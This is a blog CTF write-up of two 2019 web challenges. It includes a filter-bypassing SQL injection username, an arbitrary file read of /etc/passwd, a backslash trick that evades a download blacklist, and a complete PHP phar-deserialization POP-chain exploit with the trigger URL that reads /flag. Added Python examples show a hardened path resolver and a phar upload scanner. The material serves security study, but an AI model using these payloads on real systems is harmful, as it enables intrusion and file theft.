c1ay's blog

2019 极客巅峰 CTF write-up

Word count: 2.7k, reading time: 14 min
2019/10/20

I spent some time on Saturday on the 2019 极客巅峰 CTF and found out how weak I really am, so I need somewhere to consolidate what I learned; the challenges I solved are written up here on the blog.

aweb_1

The hint says only admin can see flag1.

The username parameter on the registration page is vulnerable to second-order SQL injection; there is a filter, which can be bypassed with `name=admin’//and//‘3`.

Registration succeeds (username: assssssssss@qq.com, password: 123456’), logging in succeeds, and the flag is returned.

upload

I did not solve this one during the contest; I worked through it after the contest ended :(

Opening the challenge, the home page has three modules:

View file: file.php?file=

Upload file: upload_file.php

Download file: download.php

The download page leaks part of its source code:

$name = $_GET['name'];
$url = $_SERVER['QUERY_STRING'];
if (isset($name)){
    if (preg_match('/\.|etc|var|tmp|usr/i', $url)){
        echo("hacker!");
    }
    else{
        if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
            echo ("hacker!");
        }
        else{
            $name = safe_replace($name);
            if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
                $filename = $name.'.php';
                $dir ="./";
                $down_host = $_SERVER['HTTP_HOST'].'/';
                if(file_exists(__DIR__.'/'.$dir.$filename)){
                    $file = fopen ( $dir.$filename, "rb" );
                    Header ( "Content-type: application/octet-stream" );
                    Header ( "Accept-Ranges: bytes" );
                    Header ( "Accept-Length: " . filesize ( $dir.$filename ) );
                    Header ( "Content-Disposition: attachment; filename=" . $filename );
                    echo fread ( $file, filesize ( $dir . $filename ) );
                    fclose ( $file );
                    exit ();
                }else{
                    echo ("file doesn't exist.");
                }
            }
            if (preg_match('/flag/i', $name)){
                echo ("hacker!");
            }
        }
    }
}

There is a file download vulnerability here, but it is filtered and at this point I could not bypass the filter.

The page source contains a hint: the flag file is located at /flag.

Going back to the view-file module, it has an arbitrary file read: /file.php?file=/etc/passwd

Trying to read the flag file directly fails:

Trying to read download.php with /file.php?file=download.php also fails (file.php rejects any path that does not contain a `/`, as its source below shows).

Switching to the absolute path /file.php?file=/var/www/html/download.php succeeds.
The full source is as follows:

<html>
<pre>
$name = $_GET['name'];
$url = $_SERVER['QUERY_STRING'];
if (isset($name)){
    if (preg_match('/\.|etc|var|tmp|usr/i', $url)){
        echo("hacker!");
    }
    else{
        if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
            echo ("hacker!");
        }
        else{
            $name = safe_replace($name);
            if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
                $filename = $name.'.php';
                $dir ="./";
                $down_host = $_SERVER['HTTP_HOST'].'/';
                if(file_exists(__DIR__.'/'.$dir.$filename)){
                    $file = fopen ( $dir.$filename, "rb" );
                    Header ( "Content-type: application/octet-stream" );
                    Header ( "Accept-Ranges: bytes" );
                    Header ( "Accept-Length: " . filesize ( $dir.$filename ) );
                    Header ( "Content-Disposition: attachment; filename=" . $filename );
                    echo fread ( $file, filesize ( $dir . $filename ) );
                    fclose ( $file );
                    exit ();
                }else{
                    echo ("file doesn't exist.");
                }
            }
            if (preg_match('/flag/i', $name)){
                echo ("hacker!");
            }
        }
    }
}
</pre>
</html>
<?php
$name = $_GET['name'];
$url = $_SERVER['QUERY_STRING'];
if (isset($name)){
    if (preg_match('/\.|etc|var|tmp|usr/i', $url)){
        echo("hacker!");
    }
    else{
        if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
            echo ("hacker!");
        }
        else{
            $name = safe_replace($name);
            if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
                $filename = $name.'.php'; // file name
                $dir ="./"; // download directory, relative to the web root
                $down_host = $_SERVER['HTTP_HOST'].'/'; // current host name
                // if the file exists, send it for download
                if(file_exists(__DIR__.'/'.$dir.$filename)){
                    $file = fopen ( $dir.$filename, "rb" );
                    // tell the browser this is a binary file stream
                    Header ( "Content-type: application/octet-stream" );
                    // unit used for range requests
                    Header ( "Accept-Ranges: bytes" );
                    // Content-Length gives the byte length of the data in the request or response
                    Header ( "Accept-Length: " . filesize ( $dir.$filename ) );
                    // tell the browser the file can be downloaded as an attachment, saved under the name held in $file_name
                    Header ( "Content-Disposition: attachment; filename=" . $filename );
                    // read the file and write it straight to the browser
                    echo fread ( $file, filesize ( $dir . $filename ) );
                    fclose ( $file );
                    exit ();
                }else{
                    echo ("file doesn't exist.");
                }
            }
            if (preg_match('/flag/i', $name)){
                echo ("hacker!");
            }
        }
    }
}
//return safe name
function safe_replace($string) {
    $string = str_replace('%20','&quot;',$string);
    $string = str_replace('%27','&quot;',$string);
    $string = str_replace('%2527','&quot;',$string);
    $string = str_replace('*','&quot;',$string);
    $string = str_replace('"','&quot;',$string);
    $string = str_replace("'",'&quot;',$string);
    $string = str_replace('"','&quot;',$string);
    $string = str_replace(';','&quot;',$string);
    $string = str_replace('<','&lt;',$string);
    $string = str_replace('>','&gt;',$string);
    $string = str_replace("{",'&quot;',$string);
    $string = str_replace('}','&quot;',$string);
    $string = str_replace('\\','',$string);
    return $string;
}

The line $string = str_replace('\\','',$string); can be used to bypass the download filter: the blacklist is checked before safe_replace() strips the backslash, so a name such as ind\ex passes the first check and only becomes index afterwards, which is exactly what the second check requires. The bypass is:

/download.php?name=ind\\ex
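
As an added example (not from the write-up or the challenge, and in Python rather than PHP), the code below contrasts download.php's ordering with a canonicalise-first design: `legacy_resolve` mirrors the page's blacklist-then-safe_replace() logic, and `hardened_resolve` (a hypothetical replacement whose `permitted` set and `base_dir` are assumptions) rejects stream-wrapper syntax, checks the bare name against an allowlist only after normalisation, and confirms that the resolved real path still lies inside the download directory.

```python
"""Validate-then-normalise versus normalise-then-validate for a user-supplied
file name. Added example; not the challenge's code."""
import os
import re

# The challenge's own blacklist from download.php
BLACKLIST = re.compile(r"base|class|file|function|index|upload_file", re.I)
# Allowlist for a bare download name: no slashes, dots, colons or backslashes
ALLOWED_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def legacy_resolve(name: str):
    """Mirror of download.php's decision logic: blacklist check first, then
    safe_replace() strips backslashes, then the same blacklist must match.
    Returns the file name that would be served, or None."""
    if BLACKLIST.search(name):
        return None                       # first check: 'hacker!'
    name = name.replace("\\", "")         # safe_replace() removes backslashes
    if BLACKLIST.search(name):
        return name + ".php"              # second check passes: file is served
    return None


def hardened_resolve(name: str, base_dir: str, permitted: set):
    """Canonicalise before validating. Rejects wrapper syntax such as phar://
    (the allowlist regex would reject it too; the explicit check documents the
    intent), allowlists the name, then checks real-path containment so that a
    symlink inside base_dir cannot point outside it.
    Returns the absolute path to serve, or None."""
    if "://" in name or ":" in name:
        return None                       # stream wrappers are never file names
    if not ALLOWED_NAME.match(name):
        return None                       # '\\', '/', '.', '..' never pass
    if name not in permitted:
        return None                       # only files meant for download
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name + ".php"))
    if os.path.commonpath([base, target]) != base:
        return None                       # resolved path escaped base_dir
    return target


if __name__ == "__main__":
    # Constructed inputs: the write-up's bypass and a phar:// style path
    for candidate in ("index", "ind\\ex", "phar:///var/www/html/upload/x.jpg", "readme"):
        print(repr(candidate), legacy_resolve(candidate),
              hardened_resolve(candidate, "/var/www/downloads", {"readme"}))
```

The point of `hardened_resolve` is not the particular regex but the order of operations: every transformation that the server will apply (here, dropping backslashes) has to happen before the decision, and the decision should be an allowlist of what may be served rather than a blacklist of what may not.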

Combining the file read and the file download, the source code can be recovered:

index.php

<?php
header("content-type:text/html;charset=utf-8");
include 'base.php';
?>

base.php

<?php
session_start();
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>upload_or_not</title>
    <link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/css/bootstrap.min.css">
    <script src="https://cdn.staticfile.org/jquery/2.1.1/jquery.min.js"></script>
    <script src="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/js/bootstrap.min.js"></script>
</head>
<body>
<nav class="navbar navbar-default" role="navigation">
    <div class="container-fluid">
        <div class="navbar-header">
            <a class="navbar-brand" href="index.php">首页</a>
        </div>
        <ul class="nav navbar-nav navbra-toggle">
            <li class="active"><a href="file.php?file=">查看文件</a></li>
            <li><a href="upload_file.php">上传文件</a></li>
            <li><a href="download.php">下载文件</a></li>
        </ul>
        <ul class="nav navbar-nav navbar-right">
            <li><a href="index.php"><span class="glyphicon glyphicon-user"></span><?php echo $_SERVER['REMOTE_ADDR'];?></a></li>
        </ul>
    </div>
</nav>
</body>
</html>
<!--flag is in /flag-->

file.php

<?php
header("content-type:text/html;charset=utf-8");
include 'function.php';
include 'class.php';
$file = $_GET["file"] ? $_GET['file'] : "";
if(empty($file)) {
    echo "<h2>There is no file to show!<h2/>";
}
if(preg_match('/http|https|file:|gopher|dict|\.\/|\.\.|flag/i',$file)) {
    die('hacker!');
}elseif(!preg_match('/\//i',$file))
{
    die('hacker!');
}
$show = new Show();
if(file_exists($file)) {
    $show->source = $file;
    $show->_show();
} else if (!empty($file)){
    die('file doesn\'t exists.');
}
?>

function.php

<?php
//show_source(__FILE__);
include "base.php";
header("Content-type: text/html;charset=utf-8");
error_reporting(0);
function upload_file_do() {
    global $_FILES;
    $filename = md5($_FILES["file"]["name"]).".jpg";
    //mkdir("upload",0777);
    if(file_exists("upload/" . $filename)) {
        unlink($filename);
    }
    move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename);
    echo '<script type="text/javascript">alert("上传成功!");</script>';
}
function upload_file() {
    global $_FILES;
    if(upload_file_check()) {
        upload_file_do();
    }
}
function upload_file_check() {
    global $_FILES;
    $allowed_types = array("gif","jpeg","jpg","png");
    $temp = explode(".",$_FILES["file"]["name"]);
    $extension = end($temp);
    if(empty($extension)) {
        //echo "<h4>请选择上传的文件:" . "<h4/>";
    }
    else{
        if(in_array($extension,$allowed_types)) {
            return true;
        }
        else {
            echo '<script type="text/javascript">alert("Invalid file!");</script>';
            return false;
        }
    }
}
?>

upload_file.php

<?php
include 'function.php';
upload_file();
?>
<html>
<head>
    <meta charest="utf-8">
    <title>文件上传</title>
</head>
<body>
<div align = "center">
    <h1>上传的文件保存在/upload/md5($_FILES["file"]["name"]).".jpg"</h1>
</div>
<style>
    p{ margin:0 auto}
</style>
<div>
    <form action="upload_file.php" method="post" enctype="multipart/form-data">
        <label for="file">文件名:</label>
        <input type="file" name="file" id="file"><br>
        <input type="submit" name="submit" value="提交">
</div>
</body>
</html>

class.php

<html>
<pre>
$name = $_GET['name'];
$url = $_SERVER['QUERY_STRING'];
if (isset($name)){
    if (preg_match('/\.|etc|var|tmp|usr/i', $url)){
        echo("hacker!");
    }
    else{
        if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
            echo ("hacker!");
        }
        else{
            $name = safe_replace($name);
            if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
                $filename = $name.'.php';
                $dir ="./";
                $down_host = $_SERVER['HTTP_HOST'].'/';
                if(file_exists(__DIR__.'/'.$dir.$filename)){
                    $file = fopen ( $dir.$filename, "rb" );
                    Header ( "Content-type: application/octet-stream" );
                    Header ( "Accept-Ranges: bytes" );
                    Header ( "Accept-Length: " . filesize ( $dir.$filename ) );
                    Header ( "Content-Disposition: attachment; filename=" . $filename );
                    echo fread ( $file, filesize ( $dir . $filename ) );
                    fclose ( $file );
                    exit ();
                }else{
                    echo ("file doesn't exist.");
                }
            }
            if (preg_match('/flag/i', $name)){
                echo ("hacker!");
            }
        }
    }
}
</pre>
</html>
<?php
class Show
{
    public $source;
    public $str;
    public function __construct($file)
    {
        $text= $this->source;
        $text = base64_encode(file_get_contents($text));
        return $text;
    }
    public function __toString()
    {
        $text= $this->source;
        $text = base64_encode(file_get_contents($text));
        return $text;
    }
    public function __set($key,$value)
    {
        $this->$key = $value;
    }
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|dict|\.\.|flag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
    }
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
class S6ow
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array();
    }
    public function __get($key)
    {
        return $this->params[$key];
    }
    public function __call($name, $arguments)
    {
        if($this->{$name})
            $this->{$this->{$name}}($arguments);
    }
    public function file_get($value)
    {
        echo $this->file;
    }
}
class Sh0w
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = new Show('index.php');
        $this->str->source = $this->test;
    }
    public function __destruct()
    {
        $this->str->_show();
    }
}
?>

After auditing the code, the flag cannot be obtained directly through the file read or the file download, because those filters cannot be bypassed.

Judging from class.php, the challenge is presumably about PHP deserialization, but there is no unserialize() call anywhere. However, the following code in file.php may be vulnerable to phar deserialization: when certain PHP functions parse a phar file through the phar:// stream wrapper, they unserialize the meta-data section of the phar, and file_exists() is one of those functions.

So the intended solution is to obtain the flag through phar deserialization, along these lines:

Build a POP chain and generate a phar file, then upload it -> use the view-file module with the phar:// wrapper to parse the uploaded phar -> file_exists() triggers the PHP deserialization -> the deserialization reads the flag.

Building the POP chain and generating the phar file; the PoC is as follows:

<?php
class Show
{
    public $source;
    public $str;
    public function __construct($file)
    {
        $this->source='/flag';
        $text= $this->source;
        $text = base64_encode(file_get_contents($text));
        return $text;
    }
    public function __toString()
    {
        $text= $this->source;
        $text = base64_encode(file_get_contents($text));
        return $text;
    }
    public function __set($key,$value)
    {
        $this->$key = $value;
    }
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|dict|\.\.|flag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
    }
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
class S6ow
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array("_show"=>"file_get");
        $this->file=new Show('/flag'); // Show::__construct() requires an argument
    }
    public function __get($key)
    {
        return $this->params[$key];
    }
    public function __call($name, $arguments)
    {
        if($this->{$name})
            $this->{$this->{$name}}($arguments);
    }
    public function file_get($value)
    {
        echo $this->file;
    }
}
class Sh0w
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = new S6ow();
    }
    public function __destruct()
    {
        $this->str->_show();
    }
}
// phar.readonly must be Off in php.ini, otherwise Phar cannot write the archive
$phar = new Phar("poc.phar"); // the extension must be .phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); // set the stub
$o = new Sh0w('poc'); // Sh0w::__construct() requires an argument
$phar->setMetadata($o); // store the custom meta-data in the manifest
$phar->addFromString("test.txt", "test"); // add a file to the archive
// the signature is computed automatically
$phar->stopBuffering();
?>

Trigger sequence:

When the Sh0w object is unserialized, its __destruct() is called, which calls _show() on the S6ow object. S6ow has no _show() method, so __call() runs with $name set to _show. Evaluating $this->{$name} looks up a non-existent _show property, which triggers __get(); that returns params['_show'], i.e. file_get, so $this->file_get($arguments) is called. Because $this->file was set to a Show object in the constructor, echoing it triggers Show's __toString(), which base64-encodes the contents of $this->source (/flag), bypassing the filter and reading the flag.

Generate the phar file, rename its extension to .jpg, upload it to the server, and read the uploaded file through the phar:// wrapper: /file.php?file=phar:///var/www/html/upload/4935ad2c4be6114f4bf09d55ed82a60b.jpg

Base64-decoding the output yields the flag.
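
As an added defensive example (not part of the write-up, and in Python rather than PHP), the scanner below inspects an uploaded blob for a phar stub and parses the phar manifest just far enough to extract the global meta-data, reporting which classes a file_exists('phar://...') call on that file would instantiate. The phar builder, the JPEG header bytes and the Sh0w meta-data string are constructed test fixtures; the manifest layout follows the published phar file format (stub ending in __HALT_COMPILER();, then 4-byte manifest length, 4-byte file count, 2-byte API version, 4-byte flags, 4-byte alias length, alias, 4-byte meta-data length, meta-data). The signature trailer a real phar carries is omitted because the scanner does not need it.

```python
"""Detect phar archives hiding behind an image extension by reading the phar
manifest's global meta-data. Added example; not the challenge's code."""
import re
import struct

HALT = b"__HALT_COMPILER();"
# PHP serialize() object header: O:<len>:"<class>":
OBJECT_RE = re.compile(rb'O:\d+:"([^"]+)":')


def phar_metadata(blob: bytes):
    """Return the global meta-data bytes of a phar blob, or None when the blob
    carries no phar stub. All integers are little-endian."""
    idx = blob.find(HALT)
    if idx < 0:
        return None
    pos = idx + len(HALT)
    # PHP tolerates an optional " ?>" and one newline after the halt token
    if blob.startswith(b" ?>", pos):
        pos += 3
    if blob.startswith(b"\r\n", pos):
        pos += 2
    elif blob.startswith(b"\n", pos):
        pos += 1
    if len(blob) < pos + 18:
        return None
    _manifest_len, _files, _api, _flags, alias_len = struct.unpack("<IIHII", blob[pos:pos + 18])
    pos += 18 + alias_len
    if len(blob) < pos + 4:
        return None
    (meta_len,) = struct.unpack("<I", blob[pos:pos + 4])
    pos += 4
    return blob[pos:pos + meta_len]


def scan_upload(blob: bytes) -> dict:
    """Classify an uploaded blob. An image should never contain a phar stub;
    a phar whose meta-data instantiates objects is the gadget carrier that
    file_exists('phar://...') would unserialize."""
    meta = phar_metadata(blob)
    if meta is None:
        return {"is_phar": False, "classes": [], "verdict": "clean"}
    classes = [m.decode("ascii", "replace") for m in OBJECT_RE.findall(meta)]
    verdict = "phar with serialized objects" if classes else "phar without objects"
    return {"is_phar": True, "classes": classes, "verdict": verdict}


def build_sample_phar(metadata: bytes, filename: bytes = b"test.txt", content: bytes = b"test") -> bytes:
    """Constructed fixture: a minimal phar-shaped blob with one file entry and
    the given global meta-data (no signature trailer)."""
    stub = b"<?php __HALT_COMPILER(); ?>\r\n"
    # file entry: name length, name, uncompressed size, timestamp,
    # compressed size, crc32, flags, per-file meta-data length
    entry = (struct.pack("<I", len(filename)) + filename
             + struct.pack("<IIIIII", len(content), 0, len(content), 0, 0, 0))
    body = (struct.pack("<IHII", 1, 0x1110, 0, 0)   # 1 file, API version field, flags, alias length 0
            + struct.pack("<I", len(metadata)) + metadata + entry)
    return stub + struct.pack("<I", len(body)) + body + content


# Constructed inputs: a JPEG header and a phar dressed up as a .jpg
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 32
PHAR_SAMPLE = build_sample_phar(b'O:4:"Sh0w":1:{s:3:"str";N;}')

if __name__ == "__main__":
    for name, blob in (("photo.jpg", JPEG_SAMPLE), ("poc.jpg", PHAR_SAMPLE)):
        print(name, scan_upload(blob))
```

The challenge's extension allowlist does nothing against this carrier, because the phar:// wrapper ignores the extension and looks only for the stub; checking uploads for __HALT_COMPILER() before they are stored, and never passing user-controlled strings to path-taking functions such as file_exists() without first rejecting wrapper prefixes, closes the gap on both sides.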

I will study the remaining challenges once the write-ups are published.
